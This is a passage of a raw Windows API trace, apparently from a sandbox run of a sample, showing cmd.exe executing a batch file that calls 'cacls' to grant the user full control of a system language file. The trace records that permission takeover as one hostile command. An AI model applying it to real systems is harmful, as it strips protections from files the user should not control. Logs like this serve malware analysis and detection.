returned 0x2 [0301.072] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x0, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.072] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x9, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.072] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x9, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.072] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x0, lpData=0xeeee28*=0x9, lpcbData=0xeeee24*=0x1000) returned 0x2 [0301.072] RegCloseKey (hKey=0x94) returned 0x0 [0301.072] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432b5 [0301.072] srand (_Seed=0x5bb432b5) [0301.072] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"\"" [0301.072] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"\"" [0301.072] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.072] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1037eb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0301.072] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0301.072] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.072] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0301.073] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0301.073] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0301.073] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0301.073] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0301.073] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0301.073] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0301.073] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0301.073] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0301.073] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0301.073] GetEnvironmentStringsW () returned 0x10380c0* [0301.073] FreeEnvironmentStringsA (penv="A") returned 1 [0301.073] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.073] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0301.073] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0301.073] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0301.073] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0301.073] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0301.073] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0301.073] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0301.073] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0301.073] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0301.074] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xeefbf4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.074] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xeefbf4, lpFilePart=0xeefbec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xeefbec*="Desktop") returned 0x1d [0301.074] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0301.074] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xeef970 | out: lpFindFileData=0xeef970) returned 0x10305c8 [0301.074] FindClose (in: hFindFile=0x10305c8 | out: hFindFile=0x10305c8) returned 1 [0301.074] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xeef970 | out: lpFindFileData=0xeef970) returned 0x10305c8 [0301.074] FindClose (in: hFindFile=0x10305c8 | out: hFindFile=0x10305c8) returned 1 [0301.074] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0301.074] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xeef970 | out: lpFindFileData=0xeef970) returned 0x10305c8 [0301.075] FindClose (in: hFindFile=0x10305c8 | out: hFindFile=0x10305c8) returned 1 [0301.075] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0301.075] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0301.075] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0301.075] GetEnvironmentStringsW () returned 0x10380c0* [0301.075] FreeEnvironmentStringsA (penv="=") returned 1 [0301.075] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.076] GetConsoleOutputCP () returned 0x1b5 [0301.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.105] GetUserDefaultLCID () returned 0x409 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xeefd24, cchData=128 | out: lpLCData="0") returned 2 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xeefd24, cchData=128 | out: lpLCData="0") returned 2 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xeefd24, cchData=128 | out: lpLCData="1") returned 2 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0301.105] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0301.106] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0301.106] GetConsoleTitleW (in: lpConsoleTitle=0x103a9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0301.143] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0301.143] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0301.143] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0301.144] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0301.144] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0301.144] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0301.144] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0301.144] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0301.144] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0301.144] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0301.145] GetConsoleTitleW (in: lpConsoleTitle=0xeefa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.145] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0301.145] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0301.146] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0301.146] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0301.146] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0301.146] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0301.146] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0301.146] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0301.146] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0301.146] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0301.146] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0301.146] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0301.146] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0301.146] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0301.146] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0301.146] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0301.146] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0301.146] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0301.146] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0301.146] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0301.146] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0301.146] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0301.146] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0301.146] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0301.146] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0301.146] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0301.146] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0301.146] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0301.146] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0301.146] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0301.146] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0301.146] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0301.146] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0301.146] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0301.146] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0301.146] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0301.146] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0301.146] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0301.146] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0301.146] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0301.146] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0301.146] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0301.146] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0301.146] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0301.146] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0301.147] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0301.147] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0301.147] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0301.147] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0301.147] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0301.147] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0301.147] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0301.147] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0301.147] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0301.147] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0301.147] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0301.147] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0301.147] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0301.147] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0301.147] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0301.147] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0301.147] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0301.147] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0301.147] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0301.147] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0301.147] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0301.147] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0301.147] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0301.147] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0301.147] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0301.147] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0301.147] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0301.147] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0301.147] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0301.147] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0301.147] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0301.147] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0301.147] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0301.147] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0301.147] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0301.148] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0301.148] SetErrorMode (uMode=0x0) returned 0x0 [0301.148] SetErrorMode (uMode=0x1) returned 0x0 [0301.148] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x10305d0, lpFilePart=0xeef51c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xeef51c*="Desktop") returned 0x1d [0301.148] SetErrorMode (uMode=0x0) returned 0x1 [0301.148] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0301.149] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.151] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.151] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0xeef2c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef2c8) returned 0x103b148 [0301.151] FindClose (in: hFindFile=0x103b148 | out: hFindFile=0x103b148) returned 1 [0301.151] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0301.151] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0301.151] GetConsoleTitleW (in: lpConsoleTitle=0xeef79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.152] ApiSetQueryApiSetPresence () returned 0x0 [0301.152] ResolveDelayLoadedAPI () returned 0x745414a0 [0301.153] SaferWorker () returned 0x0 [0301.164] SetErrorMode (uMode=0x0) returned 0x0 [0301.164] SetErrorMode (uMode=0x1) returned 0x0 [0301.164] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0x103ad28, lpFilePart=0xeef64c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xeef64c*="vRnqNMBW.bat") returned 0x2a [0301.164] SetErrorMode (uMode=0x0) returned 0x1 [0301.164] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"", _Control=" \x09") returned 0x1 [0301.165] CmdBatNotificationStub () returned 0x1 [0301.165] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xeef6dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0301.165] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0301.165] _get_osfhandle (_FileHandle=3) returned 0xb4 [0301.165] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0301.165] _get_osfhandle (_FileHandle=3) returned 0xb4 [0301.165] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0301.165] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xeef6ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xeef6ac*=0xe2, lpOverlapped=0x0) returned 1 [0301.166] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0301.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0301.166] _get_osfhandle (_FileHandle=3) returned 0xb4 [0301.166] GetFileType (hFile=0xb4) returned 0x1 [0301.166] _get_osfhandle (_FileHandle=3) returned 0xb4 [0301.166] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0301.167] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0301.167] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0301.167] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0301.167] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0301.167] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0301.167] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0301.167] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0301.167] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0301.169] _tell (_FileHandle=3) returned 32 [0301.169] _close (_FileHandle=3) returned 0 [0301.170] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xeef470 | out: _Buffer="\r\n") returned 2 [0301.170] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.170] GetFileType (hFile=0x3c) returned 0x2 [0301.170] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.170] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef448 | out: lpMode=0xeef448) returned 1 [0301.170] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.170] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xeef460, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xeef460*=0x2) returned 1 [0301.170] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0301.171] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.171] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xeef46c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0301.171] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xeef46c | out: _Buffer=">") returned 1 [0301.171] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.171] GetFileType (hFile=0x3c) returned 0x2 [0301.171] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.171] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef44c | out: lpMode=0xeef44c) returned 1 [0301.189] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.189] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xeef464, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xeef464*=0x1e) returned 1 [0301.189] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.189] GetFileType (hFile=0x3c) returned 0x2 [0301.189] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.189] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef6ec | out: lpMode=0xeef6ec) returned 1 [0301.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.190] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1037738*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xeef704, lpReserved=0x0 | out: lpBuffer=0x1037738*, lpNumberOfCharsWritten=0xeef704*=0x5) returned 1 [0301.190] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xeef70c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\" /E /G CIiHmnxMn6Ps:F /C ") returned 83 [0301.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.190] GetFileType (hFile=0x3c) returned 0x2 [0301.190] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.190] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef6e4 | out: lpMode=0xeef6e4) returned 1 [0301.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.190] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x53, lpNumberOfCharsWritten=0xeef6fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xeef6fc*=0x53) returned 1 [0301.190] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xeef720 | out: _Buffer="\r\n") returned 2 [0301.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.190] GetFileType (hFile=0x3c) returned 0x2 [0301.190] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.190] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef6f8 | out: lpMode=0xeef6f8) returned 1 [0301.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.190] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xeef710, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xeef710*=0x2) returned 1 [0301.191] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0301.191] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0301.191] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0301.191] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0301.191] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0301.191] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0301.191] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0301.191] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0301.191] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0301.191] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0301.191] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0301.191] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0301.191] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0301.191] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0301.191] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0301.191] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0301.191] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0301.191] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0301.191] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0301.191] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0301.191] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0301.191] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0301.191] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0301.191] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0301.191] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0301.191] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0301.191] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0301.191] _wcsicmp 